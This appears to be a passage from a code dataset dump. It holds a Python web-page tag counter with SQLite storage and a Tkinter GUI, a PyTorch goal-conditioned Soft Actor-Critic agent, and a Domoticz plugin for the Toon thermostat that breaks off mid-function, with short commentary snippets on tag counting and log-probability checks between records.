+{"seq_id":"613157686","text":"#!/usr/bin/python3\nimport pycurl, sys, os, time, yaml, argparse, sqlite3, pickle\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom io import BytesIO\nfrom bs4 import BeautifulSoup as BS\nfrom tabulate import tabulate as tb\n\nclass GetResponse:\n \"\"\"\n This class help you to get source code of any Web-page\n Use:\n GetResponse.encoding(value) - to change encoding for decoding HTML page\n GetResponse.get() - to get source code of Web-page\n \"\"\"\n def __init__(self, url):\n self.url = url\n self.buffer = BytesIO()\n self.enc = 'iso-8859-1'\n print('Inspected URL: {}'.format(self.url))\n def encoding(self, enc):\n self.enc = enc\n return self.enc\n def get(self):\n print('Encoding: {}'.format(self.enc))\n c = pycurl.Curl()\n c.setopt(c.URL, self.url)\n c.setopt(c.FOLLOWLOCATION, True)\n c.setopt(c.WRITEDATA, self.buffer)\n c.perform()\n c.close()\n self.body = self.buffer.getvalue()\n\nclass DB:\n \"\"\"\n This class uses for operations with sqlite3 database\n Use:\n DB.insert(site, url, tags) - to add the records to DB\n DB.select(site) - to get info about site from DB\n \"\"\"\n def __init__(self, dbname='db'):\n self.dbname = dbname\n self.table = 'taginfo'\n self.con = sqlite3.connect(self.dbname)\n self.cur = self.con.cursor()\n def insert(self, site, url, tags):\n self.cur.execute(\n \"\"\"\n create table if not exists {} (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n site CHAR,\n url TEXT,\n tags TEXT,\n timestamp DATETIME DEFAULT CURRENT_TIMESTAMP)\n \"\"\".format(self.table)\n )\n ptags = pickle.dumps(tags)\n v = (site, url, ptags,)\n self.cur.execute(\n \"\"\"\n insert into {} (site, url, tags) values (?, ?, ?)\n \"\"\".format(self.table), v\n )\n self.con.commit()\n return self.cur\n def select(self, site):\n self.cur.execute(\n \"\"\"\n select site,url,tags, timestamp from {} where site=? limit 1\n \"\"\".format(self.table), (site,)\n )\n res = self.cur.fetchall()\n if res:\n for row in res:\n l = list(row)\n l[2] = pickle.loads(l[2])\n print(l)\n info=l\n else:\n message = \"Sorry, but record for {} site is absent in the database\".format(site)\n print(message)\n info = message\n return info\n def last(self, number):\n last = self.cur.execute(\n \"\"\"\n select site from {} order by id desc limit {}\n \"\"\".format(self.table, number)\n )\n res = []\n for row in last:\n res.append(row[0])\n return res\n def close(self):\n self.cur.close()\n self.con.close()\n\ndef counter(html):\n tags = []\n res = {}\n soup = BS(html, 'html.parser')\n for tag in soup.findAll():\n tags.append(tag.name)\n uniq = list(set(tags))\n for tag in uniq:\n res[tag] = tags.count(tag)\n sort=sorted(res.items(), key=lambda x:(x[1],x[0]))\n restb=tb(sort, headers=['Tags', 'Numbers'], tablefmt='psql')\n print(restb)\n return res, restb\n\ndef log(url, lpath='logs'):\n if not os.path.exists(lpath):\n os.makedirs(lpath)\n with open('{}/{}'.format(lpath, 'access.log'), 'a+') as file:\n file.write('{} {}\\n'.format(time.strftime('%Y-%m-%d %H:%M:%S'), url))\n\ndef check_syn(yfile, syn):\n try:\n with open(yfile, 'r') as stream:\n allsyn = yaml.load(stream)\n try:\n synurl = allsyn[syn]\n return synurl, syn\n except:\n return syn, None\n except IOError:\n print(\"File {} doesn't exist! 
\\nUse --synfile option to specify other synonyms file\".format(yfile))\n sys.exit(1)\n\n\ndef download(url, synfile, enc, tktext=None, st=None, visual=False):\n print(enc)\n try:\n url, orig_syn = check_syn(synfile, url)\n response = GetResponse(url)\n if enc:\n response.encoding(enc)\n encod = response.enc\n response.get()\n tags, tagstb = counter(response.body)\n log(url)\n db = DB()\n if orig_syn:\n db.insert(orig_syn, url, tags)\n else:\n db.insert(url, url, tags)\n db.close()\n except BaseException as error:\n tagstb = error\n if visual:\n tktext.delete('1.0', END)\n tktext.insert(END, tagstb)\n st[\"text\"] = \"Enc: \" + encod\n\ndef view(vurl, synfile, tktext=None, visual=False):\n try:\n url, orig_syn = check_syn(synfile, vurl)\n db = DB()\n if orig_syn:\n res = db.select(orig_syn)\n db.close()\n else:\n res = db.select(url)\n db.close()\n except BaseException as error:\n res = error\n if visual:\n tktext.delete('1.0', END)\n tktext.insert(END, res)\n\ndef visual(title, synfile, enc):\n text = 'None'\n win = Tk()\n win.title(title)\n # \"Enter the website\" section\n textFrame = Frame(win)\n entryLabel = Label(textFrame)\n entryLabel[\"text\"] = \"Enter the website:\"\n entryLabel.grid(row=0, column=0, padx=2, pady=2)\n entryWidget = Entry(textFrame)\n entryWidget[\"width\"] = 21\n entryWidget.grid(row=0, column=1, padx=2, pady=2)\n textFrame.grid(row=0, column=0, columnspan=2, sticky=N+S+E+W)\n\n #Scrollbar and test field\n scroll = Scrollbar(win)\n text = Text(win, height=20, width=40)\n scroll.grid(row=3, column=3, sticky=N+S+E+W)\n text.grid(row=3, column=0, columnspan=2)\n scroll.config(command=text.yview)\n text.config(yscrollcommand=scroll.set)\n\n # Status bar\n stLabel = Label(win)\n stLabel[\"text\"] = \"Krasheninnikov, 2016\"\n stLabel.grid(row=4, column=0, columnspan=2)\n\n # Buttons for dowloads and shows from db\n down = Button(win, text=\"Download\")\n down.grid(row=1, column=0, padx=2, pady=2, sticky=N+S+E+W)\n down[\"command\"] = lambda: download(entryWidget.get(), synfile, enc, text, stLabel, True)\n showfromdb = Button(win, text=\"Show from DB\")\n showfromdb.grid(row=1, column=1, padx=2, pady=2, sticky=N+S+E+W)\n showfromdb[\"command\"] = lambda: view(entryWidget.get(), synfile, text, True)\n\n #Combobox\n db = DB()\n list1 = db.last(5)\n db.close()\n combobox = Combobox(win, values = list1, state='readonly', style='TButton', justify='center')\n combobox.set(list1[0]) # Пункт по умолчанию\n combobox.grid(row=2, column=1, padx=2, pady=2, sticky=N+S+E+W)\n choice = Button(win, text=\"Select\") # создаём кнопку\n choice[\"command\"] = lambda: download(combobox.get(), synfile, enc, text, stLabel, True)\n choice.grid(row=2, column=0, padx=2, pady=2, sticky=N+S+E+W)\n\n win.mainloop()\n\ndef main():\n parser = argparse.ArgumentParser(description='This program inspect a Web-page \\\n and returt the number of tags')\n parser.add_argument('-g', '--get', dest='url', default=None, type=str,\n help='URL for inspecting')\n parser.add_argument('-v', '--view', dest='vurl', type=str,\n help='URL for extracting information from DB')\n parser.add_argument('-e', '--enc', default=None, type=str,\n help='Encoding for inspecting URL')\n parser.add_argument('-s', '--synfile', default='synonyms.yaml', type=str,\n help='Path for file with synonyms')\n parser.add_argument('--version', action='version', version='%(prog)s 1.0')\n args = parser.parse_args()\n\n if args.url:\n download(args.url, args.synfile, args.enc)\n elif args.vurl:\n view(args.vurl, args.synfile)\n else:\n 
visual('TagCounter v1.0', args.synfile, args.enc)\n\nif __name__ == '__main__':\n main()\n","sub_path":"tagcounter.py","file_name":"tagcounter.py","file_ext":"py","file_size_in_byte":8141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
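`counter()` above collects every tag name, deduplicates with `set`, then calls `tags.count(tag)` once per unique tag, which is quadratic in the number of tags. `collections.Counter` produces the same tally in a single pass over the same BeautifulSoup iterator:

```python
from collections import Counter
from bs4 import BeautifulSoup

html = "<html><body><p>one</p><p>two</p><a href='#'>x</a></body></html>"
soup = BeautifulSoup(html, "html.parser")
tag_counts = Counter(tag.name for tag in soup.find_all())
assert tag_counts["p"] == 2 and tag_counts["a"] == 1
# same ordering counter() uses: by count, then tag name
print(sorted(tag_counts.items(), key=lambda kv: (kv[1], kv[0])))
```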
+{"seq_id":"269024398","text":"# from DDPG import DDPG, CriticNetwork\nfrom ReplayBuffer import ReplayBuffer\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport random\nimport math\n\ndef calculate_log_pi(log_stds, noises, actions):\n \"\"\" 確率論的な行動の確率密度を返す. \"\"\"\n # ガウス分布 `N(0, stds * I)` における `noises * stds` の確率密度の対数(= \\log \\pi(u|a))を計算する.\n # (torch.distributions.Normalを使うと無駄な計算が生じるので,下記では直接計算しています.)\n gaussian_log_probs = \\\n (-0.5 * noises.pow(2) - log_stds).sum(dim=-1, keepdim=True) - 0.5 * math.log(2 * math.pi) * log_stds.size(-1)\n\n # tanh による確率密度の変化を修正する.\n log_pis = gaussian_log_probs - torch.log(1 - actions.pow(2) + 1e-6).sum(dim=-1, keepdim=True)\n\n return log_pis\n\n\ndef reparameterize(means, log_stds):\n \"\"\" Reparameterization Trickを用いて,確率論的な行動とその確率密度を返す. \"\"\"\n # 標準偏差.\n stds = log_stds.exp()\n # 標準ガウス分布から,ノイズをサンプリングする.\n noises = torch.randn_like(means)\n # Reparameterization Trickを用いて,N(means, stds)からのサンプルを計算する.\n us = means + noises * stds\n # tanh を適用し,確率論的な行動を計算する.\n actions = torch.tanh(us)\n\n # 確率論的な行動の確率密度の対数を計算する.\n log_pis = calculate_log_pi(log_stds, noises, actions)\n\n return actions, log_pis\n\n\ndef atanh(x):\n \"\"\" tanh の逆関数. \"\"\"\n return 0.5 * (torch.log(1 + x + 1e-6) - torch.log(1 - x + 1e-6))\n\n\nclass ActorNetwork(nn.Module):\n def __init__(self, state_size, action_size, hidden_size=64):\n super().__init__()\n\n self.net = nn.Sequential(\n nn.Linear(state_size, hidden_size),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_size, 2*action_size),\n )\n\n def forward(self, states):\n return torch.tanh(self.net(states).chunk(2, dim=-1)[0])\n\n def sample(self, states):\n means, log_stds = self.net(states).chunk(2, dim=-1)\n return reparameterize(means, log_stds.clamp(-20, 2))\n\nclass CriticNetwork(nn.Module):\n def __init__(self, state_size, action_size, hidden_size=64):\n super().__init__()\n\n self.net1 = nn.Sequential(\n nn.Linear(state_size + action_size, hidden_size),\n nn.ELU(inplace=True),\n nn.Linear(hidden_size, hidden_size),\n nn.ELU(inplace=True),\n nn.Linear(hidden_size, 1),\n )\n self.net2 = nn.Sequential(\n nn.Linear(state_size + action_size, hidden_size),\n nn.ELU(inplace=True),\n nn.Linear(hidden_size, hidden_size),\n nn.ELU(inplace=True),\n nn.Linear(hidden_size, 1),\n )\n\n def forward(self, states, actions):\n x = torch.cat([states, actions], dim=-1)\n return self.net1(x), self.net2(x)\n\nclass GC_SAC():\n\n def __init__(self, state_size, velocity_size, observation_size, action_size, goal_size, hidden_size=64, device=torch.device('cuda' if torch.cuda.is_available() else 'cpu'),\n batch_size=256, gamma=0.99, lr=3e-4,\n replay_size=10**6, start_steps=10**4, tau=5e-3, alpha=0.2, reward_scale=1.0, epsilon_decay = 50000,\n automatic_entropy_tuning=True):\n\n self.name = 'GC_SAC'\n\n self.buffer = ReplayBuffer(\n buffer_size=replay_size,\n state_size=state_size,\n velocity_size=velocity_size,\n observation_size=observation_size,\n action_size=action_size,\n goal_size=goal_size,\n device=device\n )\n \n # Actor-Criticのネットワークを構築する.\n self.actor = ActorNetwork(\n state_size=state_size[0]+velocity_size[0]+observation_size[0]+goal_size[0],\n action_size=action_size[0],\n hidden_size=hidden_size\n ).to(device)\n self.critic = CriticNetwork(\n state_size=state_size[0]+velocity_size[0]+observation_size[0]+goal_size[0],\n action_size=action_size[0],\n hidden_size=hidden_size\n ).to(device)\n self.critic_target = CriticNetwork(\n 
state_size=state_size[0]+velocity_size[0]+observation_size[0]+goal_size[0],\n action_size=action_size[0],\n hidden_size=hidden_size\n ).to(device).eval()\n\n # ターゲットネットワークの重みを初期化し,勾配計算を無効にする.\n self.critic_target.load_state_dict(self.critic.state_dict())\n for param in self.critic_target.parameters():\n param.requires_grad = False\n\n # オプティマイザ.\n self.optim_actor = torch.optim.Adam(self.actor.parameters(), lr=lr)\n self.optim_critic = torch.optim.Adam(self.critic.parameters(), lr=lr)\n\n self.device = device\n\n # その他パラメータ.\n self.action_size = action_size\n self.learning_steps = 0\n self.batch_size = batch_size\n self.device = device\n self.gamma = gamma\n self.start_steps = start_steps\n self.tau = tau\n self.alpha = alpha\n self.reward_scale = reward_scale\n\n self.automatic_entropy_tuning = automatic_entropy_tuning\n\n if self.automatic_entropy_tuning:\n self.target_entropy = -torch.prod(torch.Tensor(action_size[0]).to(self.device)).item()\n self.log_alpha = torch.zeros(1, requires_grad=True, device=self.device)\n self.alpha_optim = torch.optim.Adam([self.log_alpha], lr=lr)\n \n def is_update(self, steps):\n # 学習初期の一定期間(start_steps)は学習しない.\n return steps >= max(self.start_steps, self.batch_size)\n\n def explore(self, obs_all, goal, state):\n \"\"\" 確率論的な行動と,その行動の確率密度の対数 \\log(\\pi(a|s)) を返す. \"\"\"\n _obs_all = np.concatenate(obs_all)\n\n # state_input = torch.tensor(np.concatenate([obs_all, goal]), dtype=torch.float, device=self.device).unsqueeze_(0)\n state_input = torch.tensor(np.concatenate([_obs_all, goal-state]), dtype=torch.float, device=self.device).unsqueeze_(0)\n with torch.no_grad():\n action, log_pi = self.actor.sample(state_input)\n return action.cpu().numpy()[0], log_pi.item()\n\n def exploit(self, obs_all, goal, state):\n \"\"\" 決定論的な行動を返す. 
\"\"\"\n _obs_all = np.concatenate(obs_all)\n\n # state_input = torch.tensor(np.concatenate([obs_all, goal]), dtype=torch.float, device=self.device).unsqueeze_(0)\n state_input = torch.tensor(np.concatenate([_obs_all, goal-state]), dtype=torch.float, device=self.device).unsqueeze_(0)\n with torch.no_grad():\n action = self.actor(state_input)\n return action.cpu().numpy()[0]\n\n def step(self, env, obs_all, goal, t, steps):\n t += 1\n\n state, velocity, observe = obs_all\n\n # 学習初期の一定期間(start_steps)は,ランダムに行動して多様なデータの収集を促進する.\n if steps <= self.start_steps:\n action = env.action_space.sample()\n else:\n action, _ = self.explore(obs_all, goal, state)\n\n next_obs_all, reward, done, _ = env.step(action)\n\n # ゲームオーバーではなく,最大ステップ数に到達したことでエピソードが終了した場合は,\n # 本来であればその先も試行が継続するはず.よって,終了シグナルをFalseにする.\n # NOTE: ゲームオーバーによってエピソード終了した場合には, done_masked=True が適切.\n # しかし,以下の実装では,\"たまたま\"最大ステップ数でゲームオーバーとなった場合には,\n # done_masked=False になってしまう.\n # その場合は稀で,多くの実装ではその誤差を無視しているので,今回も無視する.\n if t == env._max_episode_steps:\n done_masked = False\n else:\n done_masked = done\n\n next_state, next_velocity, next_observe = next_obs_all\n\n # リプレイバッファにデータを追加する.\n self.buffer.append(\n state, velocity, observe,\n action, reward, done_masked, \n next_state, next_velocity, next_observe, \n goal\n )\n\n # エピソードが終了した場合には,環境をリセットする.\n if done:\n t = 0\n next_obs_all = env.reset()\n\n return next_obs_all, t\n\n def update(self):\n self.learning_steps += 1\n \n states, velocitys, observations, actions, rewards, dones, next_states, next_velocitys, next_observations, goals = self.buffer.sample(self.batch_size)\n # states, actions, rewards, dones, collisions, next_states, goals = self.buffer.sample(self.batch_size)\n\n obs_alls = torch.cat([states, velocitys, observations], dim=-1)\n next_obs_alls = torch.cat([next_states, next_velocitys, next_observations], dim=-1)\n\n states2 = torch.cat([obs_alls, goals-states], dim=-1)\n next_states2 = torch.cat([next_obs_alls, goals-next_states], dim=-1)\n\n self.update_critic(states2, next_states2, obs_alls, actions, rewards, dones, next_obs_alls, goals, states, next_states)\n self.update_actor(states2, obs_alls, goals, states)\n self.update_target()\n\n def update_critic(self, states2, next_states2, obs_alls, actions, rewards, dones, next_obs_alls, goals, states, next_states):\n # states2 = torch.cat([states, goals], dim=-1)\n # states2 = torch.cat([obs_alls, goals-states], dim=-1)\n curr_qs1, curr_qs2 = self.critic(states2, actions)\n\n with torch.no_grad():\n # next_states2 = torch.cat([next_states, goals], dim=-1)\n # next_states2 = torch.cat([next_obs_alls, goals-next_states], dim=-1)\n next_actions, log_pis = self.actor.sample(next_states2)\n next_qs1, next_qs2 = self.critic_target(next_states2, next_actions)\n next_qs = torch.min(next_qs1, next_qs2) - self.alpha * log_pis\n target_qs = rewards * self.reward_scale + (1.0 - dones) * self.gamma * next_qs\n\n loss_critic1 = (curr_qs1 - target_qs).pow_(2).mean()\n loss_critic2 = (curr_qs2 - target_qs).pow_(2).mean()\n\n self.optim_critic.zero_grad()\n (loss_critic1 + loss_critic2).backward(retain_graph=False)\n self.optim_critic.step()\n\n def update_actor(self, states2, obs_alls, goals, states):\n # states2 = torch.cat([states, goals], dim=-1)\n # states2 = torch.cat([obs_alls, goals-states], dim=-1)\n actions, log_pis = self.actor.sample(states2)\n qs1, qs2 = self.critic(states2, actions)\n loss_actor = (self.alpha * log_pis - torch.min(qs1, qs2)).mean()\n\n self.optim_actor.zero_grad()\n loss_actor.backward(retain_graph=False)\n 
self.optim_actor.step()\n\n if self.automatic_entropy_tuning:\n alpha_loss = -(self.log_alpha * (log_pis + self.target_entropy).detach()).mean()\n\n self.alpha_optim.zero_grad()\n alpha_loss.backward()\n self.alpha_optim.step()\n\n self.alpha = self.log_alpha.exp()\n\n def update_target(self):\n for t, s in zip(self.critic_target.parameters(), self.critic.parameters()):\n t.data.mul_(1.0 - self.tau)\n t.data.add_(self.tau * s.data)\n\n def save(self, path=\"./\"):\n torch.save(self.actor.to('cpu').state_dict(), path+\"GC_SAC_HER_actor.pth\")\n self.actor.to(self.device)\n\n torch.save(self.critic.to('cpu').state_dict(), path+\"GC_SAC_HER_critic.pth\")\n self.critic.to(self.device)\n\n def load(self, path=\"./\"):\n self.actor.load_state_dict(torch.load(path+\"GC_SAC_HER_actor.pth\"))\n self.critic.load_state_dict(torch.load(path+\"GC_SAC_HER_critic.pth\"))\n\n'''\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\nstate_t と state_t+1 のそれぞれに対して goal を concat するのが下位層だと面倒なので上位層(Bufferくらい)でconcatしたい\n\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n'''","sub_path":"GC_SAC.py","file_name":"GC_SAC.py","file_ext":"py","file_size_in_byte":12455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
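The comment in `calculate_log_pi` above notes that `torch.distributions.Normal` is bypassed to avoid redundant computation; the closed form it uses can be verified against the distributions API directly. A small self-check, one sample with unit standard deviations:

```python
import math
import torch

torch.manual_seed(0)
means = torch.zeros(1, 2)
log_stds = torch.zeros(1, 2)                 # stds = 1
noises = torch.randn_like(means)
us = means + noises * log_stds.exp()
actions = torch.tanh(us)

# closed form used by calculate_log_pi above
gaussian = (-0.5 * noises.pow(2) - log_stds).sum(-1, keepdim=True) \
    - 0.5 * math.log(2 * math.pi) * log_stds.size(-1)
log_pis = gaussian - torch.log(1 - actions.pow(2) + 1e-6).sum(-1, keepdim=True)

# same density via torch.distributions, with the identical tanh correction
normal = torch.distributions.Normal(means, log_stds.exp())
ref = normal.log_prob(us).sum(-1, keepdim=True) \
    - torch.log(1 - actions.pow(2) + 1e-6).sum(-1, keepdim=True)
assert torch.allclose(log_pis, ref, atol=1e-5)
```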
+{"seq_id":"398156889","text":"# ToonApiLib for Domoticz\n# https://github.com/JohnvandeVrugt/toonapilib4domoticz\n# by John van de Vrugt\n#\n# A domoticz plugin based on the toonapilib by Costas Tyfoxylos\n# https://github.com/costastf/toonapilib/\n\"\"\"\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\"\"\"\nimport Domoticz\nimport toonapilib\n\nUNIT_POWER = 1\nUNIT_GAS = 2\nUNIT_TEMPERATURE = 3\nUNIT_SET_POINT = 4\nUNIT_HEATING_ACTIVE = 5\nUNIT_HOT_WATER_ACTIVE = 6\nUNIT_PREHEAT_ACTIVE = 7\nUNIT_SCENE = 8\nUNIT_PROGRAM_STATE = 9\nUNIT_MODULATION_LEVEL = 10\n\nHEARTBEATS_PER_MIN = 6\n\n\nclass ToonApiLibPlugin:\n my_toon = None\n heart_beat = 0\n print_debug_log = True\n heart_bead_mod = 1\n\n prv_str_power = \"\"\n prv_str_gas = \"\"\n prv_str_temp = \"\"\n prv_str_set_point = \"\"\n prv_str_burner_state = \"\"\n prv_str_thermostat_state = \"\"\n prv_program_state = -1\n prv_modulation_level = -1\n\n def __init__(self):\n return\n\n def on_start(self):\n Domoticz.Log(\"Using toonapilib version \" + toonapilib.__version__ + \" by \" + toonapilib.__author__)\n\n self.print_debug_log = Parameters[\"Mode6\"] == \"Debug\"\n if self.print_debug_log:\n Domoticz.Log(\"Debug logging is active\")\n\n updates_per_min = 1\n if Parameters[\"Mode3\"] != \"\":\n updates_per_min = int(Parameters[\"Mode3\"])\n self.heart_bead_mod = HEARTBEATS_PER_MIN * updates_per_min\n\n if self.my_toon is None:\n self._create_toon_object()\n\n self._check_and_create_devices()\n self._update_devices()\n\n def on_command(self, Unit, Command, Level, Hue):\n if self.print_debug_log:\n Domoticz.Log(\"onCommand called for Unit \" + str(Unit) + \": Parameter '\" +\n str(Command) + \"', Level: \" + str(Level))\n\n try:\n if Unit == UNIT_SET_POINT:\n self.my_toon.thermostat = Level\n Domoticz.Log(\"set set point \" + str(Level))\n Devices[UNIT_SET_POINT].Update(0, str(Level))\n except:\n Domoticz.Log(\"An error occurred setting thermostat\")\n\n try:\n if Unit == UNIT_SCENE:\n str_scene = self.get_scene_name(Level)\n self.my_toon.thermostat_state = str_scene\n Domoticz.Log(\"set scene \" + str(Level) + \" - \" + str_scene)\n Devices[UNIT_SCENE].Update(2, str(Level))\n except:\n Domoticz.Log(\"An error occurred setting scene\")\n\n try:\n if Unit == UNIT_PROGRAM_STATE:\n str_program_state = str(Command).lower()\n self.my_toon.program_state = str_program_state\n program_state = 0\n if str_program_state != \"off\":\n program_state = 1\n Domoticz.Log(\"set program state \" + str_program_state + \" - \" + str(program_state))\n Devices[UNIT_PROGRAM_STATE].Update(program_state, str(program_state))\n except:\n Domoticz.Log(\"An error occurred setting program state\")\n\n def on_heartbeat(self):\n self.heart_beat = self.heart_beat + 1\n if self.my_toon is not None and self.heart_beat == self.heart_bead_mod:\n self.heart_beat = 0\n self._update_devices()\n\n def _create_toon_object(self):\n try:\n myname = Parameters[\"Username\"]\n mypass = Parameters[\"Password\"]\n mykey = Parameters[\"Mode1\"]\n mysecret = Parameters[\"Mode2\"]\n\n if self.print_debug_log:\n Domoticz.Log(\"Creating toonapilib object\")\n\n self.my_toon = toonapilib.Toon(myname, mypass, mykey, mysecret)\n except Exception:\n self.my_toon = None\n Domoticz.Log(\"Could not create a toonapilib object\")\n Domoticz.Log(\"Possible solution:\")\n Domoticz.Log(\"* Check your credentials\")\n Domoticz.Log(\"* Restart Domoticz\")\n\n def _check_and_create_devices(self):\n Domoticz.Log(\"Check and create Toon devices\")\n\n if UNIT_POWER not in Devices:\n try:\n 
Domoticz.Log(\"Creating Power usage device\")\n Domoticz.Device(Name=\"Power usage\",\n Unit=UNIT_POWER,\n Type=250,\n Subtype=1).Create()\n except:\n Domoticz.Log(\"An error occurred creating Power usage device\")\n\n if UNIT_GAS not in Devices:\n try:\n Domoticz.Log(\"Creating Gas usage device\")\n Domoticz.Device(Name=\"Gas usage\",\n Unit=UNIT_GAS,\n Type=251,\n Subtype=2).Create()\n except:\n Domoticz.Log(\"An error occurred creating Gas usage device\")\n\n if UNIT_TEMPERATURE not in Devices:\n try:\n Domoticz.Log(\"Creating Room temperature device\")\n Domoticz.Device(Name=\"Room temperature\",\n Unit=UNIT_TEMPERATURE,\n Type=80,\n Subtype=5).Create()\n except:\n Domoticz.Log(\"An error occurred creating Room temperature device\")\n\n if UNIT_SET_POINT not in Devices:\n try:\n Domoticz.Log(\"Creating Set point device\")\n Domoticz.Device(Name=\"Set point\",\n Unit=UNIT_SET_POINT,\n Type=242,\n Subtype=1).Create()\n except:\n Domoticz.Log(\"An error occurred creating Set point device\")\n\n if UNIT_HEATING_ACTIVE not in Devices:\n try:\n Domoticz.Log(\"Creating Heating active device\")\n Domoticz.Device(Name=\"Heating active\",\n Unit=UNIT_HEATING_ACTIVE,\n Type=244,\n Subtype=62,\n Switchtype=0,\n Image=9).Create()\n except:\n Domoticz.Log(\"An error occurred creating Heating active device\")\n\n if UNIT_HOT_WATER_ACTIVE not in Devices:\n try:\n Domoticz.Log(\"Creating Hot water active device\")\n Domoticz.Device(Name=\"Hot water active\",\n Unit=UNIT_HOT_WATER_ACTIVE,\n Type=244,\n Subtype=62,\n Switchtype=0,\n Image=9).Create()\n except:\n Domoticz.Log(\"An error occurred creating Hot water active device\")\n\n if UNIT_PREHEAT_ACTIVE not in Devices:\n try:\n Domoticz.Log(\"Creating Preheat active device\")\n Domoticz.Device(Name=\"Preheat active\",\n Unit=UNIT_PREHEAT_ACTIVE,\n Type=244,\n Subtype=62,\n Switchtype=0,\n Image=9).Create()\n except:\n Domoticz.Log(\"An error occurred creating Preheat active device\")\n\n if UNIT_SCENE not in Devices:\n try:\n Domoticz.Log(\"Creating Scene device\")\n options = {\n \"LevelNames\": \"Unknown|Away|Sleep|Home|Comfort|Holiday\",\n \"LevelOffHidden\": \"true\", \"SelectorStyle\": \"0\"}\n Domoticz.Device(Name=\"Scene\",\n Unit=UNIT_SCENE,\n TypeName=\"Selector Switch\",\n Options=options).Create()\n except:\n Domoticz.Log(\"An error occurred creating Scene device\")\n\n if UNIT_PROGRAM_STATE not in Devices:\n try:\n Domoticz.Log(\"Creating Program state device\")\n Domoticz.Device(Name=\"Program state\",\n Unit=UNIT_PROGRAM_STATE,\n Type=244,\n Subtype=62,\n Switchtype=0,\n Image=9).Create()\n except:\n Domoticz.Log(\"An error occurred creating Program state device\")\n\n if UNIT_MODULATION_LEVEL not in Devices:\n try:\n Domoticz.Log(\"Creating Modulation level device\")\n Domoticz.Device(Name=\"Modulation level\",\n Unit=UNIT_MODULATION_LEVEL,\n Type=243,\n Subtype=6,\n Switchtype=0).Create()\n except:\n Domoticz.Log(\"An error occurred creating Modulation level device\")\n\n def _update_devices(self):\n if self.my_toon is not None:\n self._update_power()\n self._update_gas()\n self._update_temperature()\n self._update_set_point()\n self._update_burner_state()\n self._update_thermostat_state()\n self._update_program_active()\n self._update_modulation_level()\n\n def _update_power(self):\n try:\n str_power = str(self.my_toon.power.meter_reading_low) + \";\" + \\\n str(self.my_toon.power.meter_reading) + \";\" + \\\n str(self.my_toon.solar.meter_reading_low_produced) + \";\" + \\\n str(self.my_toon.solar.meter_reading_produced) + \";\" + 
\\\n str(self.my_toon.power.value) + \";\" + str(self.my_toon.solar.value)\n\n if str_power != self.prv_str_power:\n if self.print_debug_log:\n Domoticz.Log(\"Update power/solar usage: \" + str_power)\n Devices[UNIT_POWER].Update(0, str_power)\n\n self.prv_str_power = str_power\n except:\n Domoticz.Log(\"An error occurred updating power usage\")\n\n def _update_gas(self):\n try:\n str_gas = str(self.my_toon.gas.daily_usage)\n\n if str_gas != self.prv_str_gas:\n if self.print_debug_log:\n Domoticz.Log(\"Update gas usage: \" + str_gas)\n Devices[UNIT_GAS].Update(0, str_gas)\n\n self.prv_str_gas = str_gas\n except:\n Domoticz.Log(\"An error occurred updating gas usage\")\n\n def _update_temperature(self):\n try:\n str_temp = str(self.my_toon.temperature)\n\n if str_temp != self.prv_str_temp:\n if self.print_debug_log:\n Domoticz.Log(\"Update temperature: \" + str_temp)\n Devices[UNIT_TEMPERATURE].Update(0, str_temp)\n\n self.prv_str_temp = str_temp\n except:\n Domoticz.Log(\"An error occurred updating temperature\")\n\n def _update_set_point(self):\n try:\n str_set_point = str(self.my_toon.thermostat)\n\n if str_set_point != self.prv_str_set_point:\n if self.print_debug_log:\n Domoticz.Log(\"Update set point: \" + str_set_point)\n Devices[UNIT_SET_POINT].Update(0, str_set_point)\n\n self.prv_str_set_point = str_set_point\n except:\n Domoticz.Log(\"An error occurred updating thermostat set point\")\n\n def _update_burner_state(self):\n try:\n str_burner_state = \"\"\n\n try:\n str_burner_state = self.my_toon.burner_state\n except:\n Domoticz.Log(\"An error occurred updating burner state\")\n\n if str_burner_state != \"\":\n \n if str_burner_state != self.prv_str_burner_state:\n \n if self.print_debug_log:\n Domoticz.Log(\"Update burner state: \" + str_burner_state)\n\n if str_burner_state == \"on\":\n Devices[UNIT_HEATING_ACTIVE].Update(1, str(1))\n elif str_burner_state == \"water_heating\":\n Devices[UNIT_HOT_WATER_ACTIVE].Update(1, str(1))\n elif str_burner_state == \"pre_heating\":\n Devices[UNIT_PREHEAT_ACTIVE].Update(1, str(1))\n \n if self.prv_str_burner_state == \"on\":\n Devices[UNIT_HEATING_ACTIVE].Update(0, str(0))\n elif self.prv_str_burner_state == \"water_heating\":\n Devices[UNIT_HOT_WATER_ACTIVE].Update(0, str(0))\n elif self.prv_str_burner_state == \"pre_heating\":\n Devices[UNIT_PREHEAT_ACTIVE].Update(0, str(0))\n \n self.prv_str_burner_state = str_burner_state\n except:\n Domoticz.Log(\"An error occurred updating burner state\")\n\n def _update_thermostat_state(self):\n try:\n str_thermostat_state = \"\"\n if not self.my_toon.thermostat_state:\n str_thermostat_state = \"Unknown\"\n if self.print_debug_log:\n Domoticz.Log(\"Update state: Manual set point - no thermostat state chosen\")\n else:\n str_thermostat_state = str(self.my_toon.thermostat_state.name)\n\n if str_thermostat_state != \"\":\n if str_thermostat_state != self.prv_str_thermostat_state:\n if self.print_debug_log:\n Domoticz.Log(\"Update state: \" + str_thermostat_state + \" - \" +\n str(self.get_scene_value(str_thermostat_state)))\n Devices[UNIT_SCENE].Update(2, str(self.get_scene_value(str_thermostat_state)))\n\n self.prv_str_thermostat_state = str_thermostat_state\n except:\n Domoticz.Log(\"An error occurred updating thermostat state\")\n\n def _update_program_active(self):\n try:\n program_state = 0\n if self.my_toon.program_state != \"off\":\n program_state = 1\n\n if program_state != self.prv_program_state:\n if self.print_debug_log:\n Domoticz.Log(\"Update program state: \" + str(program_state))\n 
